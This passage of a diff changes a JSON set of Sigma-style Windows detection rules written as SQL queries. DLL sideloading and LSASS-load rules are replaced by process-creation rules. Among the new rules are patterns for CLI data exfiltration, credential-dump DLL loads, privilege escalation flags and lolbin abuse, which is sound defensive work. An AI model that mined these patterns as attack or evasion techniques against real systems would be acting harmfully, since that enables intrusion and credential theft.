"filename": "image_load_dll_sdiageng_load_by_msdt.yml" + "filename": "proc_creation_win_powershell_zip_compress.yml" }, { - "title": "Potential DLL Sideloading Of Non-Existent DLLs From System Folders", - "id": "6b98b92b-4f00-4f62-b4fe-4d1920215771", + "title": "Suspicious RunAs-Like Flag Combination", + "id": "50d66fb0-03f8-4da0-8add-84e77d12a020", "status": "experimental", - "description": "Detects DLL sideloading of system dlls that are not present on the system by default. Usually to achieve techniques such as UAC bypass and privilege escalation", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious command line flags that let the user set a target user and command as e.g. 
seen in PsExec-like tools", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT ((Signed = 'true' AND Signature = 'Microsoft Windows')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -u system %' ESCAPE '\\' OR CommandLine LIKE '% --user system %' ESCAPE '\\' OR CommandLine LIKE '% -u NT%' ESCAPE '\\' OR CommandLine LIKE '% -u \"NT%' ESCAPE '\\' OR CommandLine LIKE '% -u ''NT%' ESCAPE '\\' OR CommandLine LIKE '% --system %' ESCAPE '\\' OR CommandLine LIKE '% -u administrator %' ESCAPE '\\') AND (CommandLine LIKE '% -c cmd%' ESCAPE '\\' OR CommandLine LIKE '% -c \"cmd%' ESCAPE '\\' OR CommandLine LIKE '% -c powershell%' ESCAPE '\\' OR CommandLine LIKE '% -c \"powershell%' ESCAPE '\\' OR CommandLine LIKE '% --command cmd%' ESCAPE '\\' OR CommandLine LIKE '% --command powershell%' ESCAPE '\\' OR CommandLine LIKE '% -c whoami%' ESCAPE '\\' OR CommandLine LIKE '% -c wscript%' ESCAPE '\\' OR CommandLine LIKE '% -c cscript%' ESCAPE '\\'))" ], - "filename": "image_load_side_load_non_existent_dlls.yml" + "filename": "proc_creation_win_susp_privilege_escalation_cli_patterns.yml" }, { - 
"title": "Potential Rcdll.DLL Sideloading", - "id": "6e78b74f-c762-4800-82ad-f66787f10c8a", - "status": "experimental", - "description": "Detects potential DLL sideloading of rcdll.dll", - "author": "X__Junior", + "title": "File or Folder Permissions Modifications", + "id": "37ae075c-271b-459b-8d7b-55ad5f993dd8", + "status": "test", + "description": "Detects a file or folder's permissions being modified or tampered with.", + "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1222.001" ], "falsepositives": [ - "Unknown" + "Users interacting with the files on their own (unlikely unless privileged users).", + "Dynatrace app" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\rcdll.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\cacls.exe' ESCAPE '\\' OR Image LIKE '%\\\\icacls.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND (CommandLine LIKE '%/grant%' ESCAPE '\\' OR CommandLine LIKE '%/setowner%' ESCAPE '\\' OR CommandLine LIKE '%/inheritance:r%' ESCAPE '\\')) OR (Image LIKE '%\\\\attrib.exe' ESCAPE '\\' AND CommandLine LIKE '%-r%' ESCAPE '\\') OR Image LIKE '%\\\\takeown.exe' ESCAPE '\\') AND NOT ((CommandLine LIKE '%ICACLS C:\\\\ProgramData\\\\dynatrace\\\\gateway\\\\config\\\\connectivity.history /reset' ESCAPE '\\') OR (CommandLine LIKE '%ICACLS C:\\\\ProgramData\\\\dynatrace\\\\gateway\\\\config\\\\config.properties /grant :r %' ESCAPE '\\' AND CommandLine LIKE 
'%S-1-5-19:F%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\')))" ], - "filename": "image_load_side_load_rcdll.yml" + "filename": "proc_creation_win_susp_file_permission_modifications.yml" }, { - "title": "VMGuestLib DLL Sideload", - "id": "70e8e9b4-6a93-4cb7-8cde-da69502e7aff", - "status": "experimental", - "description": "Detects DLL sideloading of VMGuestLib.dll by the WmiApSrv service.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Explorer Process Tree Break", + "id": "949f1ffb-6e85-4f00-ae1e-c3c5b190d605", + "status": "test", + "description": "Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries,\nwhich is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from \"svchost\"\n", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @gott_cyber", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1036" ], "falsepositives": [ - "FP could occur if the legitimate version of vmGuestLib already exists on the system" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\VMware\\\\VMware Tools\\\\vmStatsProvider\\\\win32%' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\vmGuestLib.dll%' ESCAPE '\\' AND Image LIKE '%\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe' ESCAPE '\\') AND NOT (Signed = 'true'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b}%' ESCAPE '\\' OR (CommandLine LIKE '%explorer.exe%' ESCAPE '\\' AND CommandLine LIKE '% /root,%' ESCAPE '\\')))" ], - 
"filename": "image_load_side_load_vmguestlib.yml" + "filename": "proc_creation_win_explorer_break_process_tree.yml" }, { - "title": "Potential DLL Sideloading Using Coregen.exe", - "id": "0fa66f66-e3f6-4a9c-93f8-4f2610b00171", + "title": "Suspicious Microsoft OneNote Child Process", + "id": "c27515df-97a9-4162-8a60-dc0eeb51b775", "status": "experimental", - "description": "Detect usage of DLL \"coregen.exe\" (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs.", - "author": "frack113", + "description": "Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file.", + "author": "Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.t1055" + "attack.t1566", + "attack.t1566.001", + "attack.initial_access" ], "falsepositives": [ - "Unknown" + "File located in the AppData folder with trusted signature" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\coregen.exe' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Silverlight\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Silverlight\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\onenote.exe' ESCAPE '\\' AND ((OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 
'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\control.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\installutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\javaw.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msidb.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR Image LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regasm.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\explorer.exe' 
ESCAPE '\\' AND (CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.pif%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\')) OR (Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\FileCoAuth.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\')))" ], - "filename": "image_load_side_load_coregen.yml" + "filename": "proc_creation_win_office_onenote_susp_child_processes.yml" }, { - "title": "Potential Iviewers.DLL Sideloading", - "id": "4c21b805-4dd7-469f-b47d-7383a8fcb437", + "title": "Suspicious Execution of Shutdown to Log Out", + "id": "ec290c06-9b6b-4338-8b6b-095c0f284f10", "status": "experimental", - "description": "Detects potential DLL sideloading of \"iviewers.dll\" (OLE/COM Object Interface Viewer)", - "author": "X__Junior", + "description": "Detects the rare use of the command line tool shutdown to logoff a user", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.impact", + "attack.t1529" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND 
ImageLoaded LIKE '%\\\\iviewers.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Kits\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\shutdown.exe' ESCAPE '\\' AND CommandLine LIKE '%/l%' ESCAPE '\\')" ], - "filename": "image_load_side_load_iviewers.yml" + "filename": "proc_creation_win_shutdown_logoff.yml" }, { - "title": "Load Of Dbghelp/Dbgcore DLL From Suspicious Process", - "id": "0e277796-5f23-4e49-a490-483131d4f6e1", + "title": "Deny Service Access Using Security Descriptor Tampering Via Sc.EXE", + "id": "99cf1e02-00fb-4c0d-8375-563f978dfd37", "status": "test", - "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecraft use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", - "author": "Perez Diego (@darkquassar), oscd.community, Ecco", + "description": "Detects suspicious DACL modifications to deny access to a service that affects critical trustees. 
This can be used to hide services or make them unstoppable.", + "author": "Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND (Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\dnx.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE 'C:\\\\WINDOWS\\\\winsxs\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\TiWorker.exe -Embedding' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%D;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" ], - "filename": "image_load_dll_dbghelp_dbgcore_susp_load.yml" + "filename": "proc_creation_win_sc_sdset_deny_service_access.yml" }, { - "title": "DotNET 
DLL Loaded Via Office Applications", - "id": "ff0f2b05-09db-4095-b96d-1b75ca24894a", - "status": "test", - "description": "Detects any assembly DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "title": "Suspicious Vsls-Agent Command With AgentExtensionPath Load", + "id": "43103702-5886-11ed-9b6a-0242ac120002", + "status": "experimental", + "description": "Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter", + "author": "bohops", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "False positives depend on custom use of vsls-agent.exe" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Windows\\\\assembly\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\vsls-agent.exe' ESCAPE '\\' AND CommandLine LIKE '%--agentExtensionPath%' ESCAPE '\\') AND NOT (CommandLine LIKE '%Microsoft.VisualStudio.LiveShare.Agent.%' ESCAPE '\\'))" ], - "filename": "image_load_office_dotnet_assembly_dll_load.yml" + "filename": "proc_creation_win_vslsagent_agentextensionpath_load.yml" }, { - "title": "Suspicious Renamed Comsvcs DLL Loaded By Rundll32", - "id": "8cde342c-ba48-4b74-b615-172c330f2e93", + "title": "Potential Data Exfiltration Activity Via CommandLine Tools", + "id": 
"7d1aaf3d-4304-425c-b7c3-162055e0b3ab", "status": "experimental", - "description": "Detects rundll32 loading a renamed comsvcs.dll to dump process memory", + "description": "Detects the use of various CLI utilities exfiltrating data via web requests", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.defense_evasion", - "attack.t1003.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (Hashes LIKE '%IMPHASH=eed93054cb555f3de70eaa9787f32ebb%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5e0dbdec1fce52daae251a110b4f309d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=eadbccbb324829acb5f2bbe87e5549a8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=407ca0f7b523319d758a40d7c0193699%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=281d618f4e6271e527e6386ea6f748de%' ESCAPE '\\')) AND NOT (ImageLoaded LIKE '%\\\\comsvcs.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\') AND CommandLine LIKE '% -ur%' ESCAPE '\\' AND CommandLine LIKE '% -me%' ESCAPE '\\' AND CommandLine LIKE '% -b%' ESCAPE '\\' AND CommandLine LIKE '% POST %' ESCAPE '\\') OR (Image LIKE '%\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--ur%' ESCAPE '\\' AND (CommandLine LIKE '% -d %' ESCAPE '\\' OR CommandLine LIKE '% --data %' ESCAPE '\\'))) AND ((CommandLine LIKE '%ToBase64String%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%nltest%' ESCAPE '\\' OR CommandLine LIKE 
'%ifconfig%' ESCAPE '\\' OR CommandLine LIKE '%hostname%' ESCAPE '\\' OR CommandLine LIKE '%net view%' ESCAPE '\\' OR CommandLine LIKE '%qprocess%' ESCAPE '\\' OR CommandLine LIKE '%netstat%' ESCAPE '\\' OR CommandLine LIKE '%systeminfo%' ESCAPE '\\' OR CommandLine LIKE '%tasklist%' ESCAPE '\\' OR CommandLine LIKE '%sc query%' ESCAPE '\\') OR (CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\%' ESCAPE '\\')))" ], - "filename": "image_load_dll_comsvcs_load_renamed_version_by_rundll32.yml" + "filename": "proc_creation_win_susp_data_exfiltration_via_cli.yml" }, { - "title": "Unsigned Image Loaded Into LSASS Process", - "id": "857c8db3-c89b-42fb-882b-f681c7cf4da2", - "status": "test", - "description": "Loading unsigned image (DLL, EXE) into LSASS process", - "author": "Teymur Kheirkhabarov, oscd.community", + "title": "Suspicious IIS URL GlobalRules Rewrite Via AppCmd", + "id": "7c8af9b2-dcae-41a2-a9db-b28c288b5f08", + "status": "experimental", + "description": "Detects usage of \"appcmd\" to create new global URL rewrite rules. 
This behaviour has been observed being used by threat actors to add new rules so they can access their webshells.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion" ], "falsepositives": [ - "Valid user connecting using RDP" + "Legitimate usage of appcmd to add new URL rewrite rules" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\lsass.exe' ESCAPE '\\' AND Signed = 'false')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%section:system.webServer/rewrite/globalRules%' ESCAPE '\\' AND CommandLine LIKE '%commit:%' ESCAPE '\\'))" ], - "filename": "image_load_unsigned_image_loaded_into_lsass.yml" + "filename": "proc_creation_win_iis_appcmd_susp_rewrite_rule.yml" }, { - "title": "Python Py2Exe Image Load", - "id": "cbb56d62-4060-40f7-9466-d8aaf3123f83", + "title": "REGISTER_APP.VBS Proxy Execution", + "id": "1c8774a0-44d4-4db0-91f8-e792359c70bd", "status": "experimental", - "description": "Detects the image load of Python Core indicative of a Python script bundled with Py2Exe.", - "author": "Patrick St. John, OTR (Open Threat Research)", + "description": "Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027.002" + "attack.t1218" ], "falsepositives": [ - "Legitimate Py2Exe Binaries", - "Known false positive caused with Python Anaconda" + "Legitimate usage of the script. 
Always investigate what's being registered to confirm if it's benign" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Description = 'Python Core' AND NOT ((Image LIKE '%Python%' ESCAPE '\\' OR (Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\%' ESCAPE '\\')) OR (Image = '')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\register\\_app.vbs%' ESCAPE '\\' AND CommandLine LIKE '%-register%' ESCAPE '\\')" ], - "filename": "image_load_susp_python_image_load.yml" + "filename": "proc_creation_win_lolbin_register_app.yml" }, { - "title": "FoggyWeb Backdoor DLL Loading", - "id": "640dc51c-7713-4faa-8a0e-e7c0d9d4654c", - "status": "test", - "description": "Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. 
Which loads a malicious version of the expected \"version.dll\" dll", - "author": "Florian Roth (Nextron Systems)", + "title": "DeviceCredentialDeployment Execution", + "id": "b8b1b304-a60f-4999-9a6e-c547bde03ffd", + "status": "experimental", + "description": "Detects the execution of DeviceCredentialDeployment to hide a process from view", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1587" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE 'C:\\\\Windows\\\\ADFS\\\\version.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\DeviceCredentialDeployment.exe' ESCAPE '\\')" ], - "filename": "image_load_malware_foggyweb_nobelium.yml" + "filename": "proc_creation_win_lolbin_device_credential_deployment.yml" }, { - "title": "Microsoft Defender Loading DLL from Nondefault Path", - "id": "418dc89a-9808-4b87-b1d7-e5ae0cb6effc", - "status": "experimental", - "description": "Detects loading of Microsoft Defender's DLLs by its processes (MpCmdRun and NisSrv) from the non-default directory which may be an attempt to sideload arbitrary DLL", - "author": "Bhabesh Raj", + "title": "Renamed Whoami Execution", + "id": "f1086bf7-a0c4-4a37-9102-01e573caf4a0", + "status": "test", + "description": "Detects the execution of whoami that has been renamed to a different name to avoid detection", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Very unlikely" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR Image LIKE '%\\\\NisSrv.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\mpclient.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'whoami.exe' AND NOT (Image LIKE '%\\\\whoami.exe' ESCAPE '\\'))" ], - "filename": "image_load_side_load_windows_defender.yml" + "filename": "proc_creation_win_renamed_whoami.yml" }, { - "title": "Time Travel Debugging Utility Usage - Image", - "id": "e76c8240-d68f-4773-8880-5c6f63595aaf", - "status": "test", - "description": "Detects usage of Time Travel Debugging Utility. 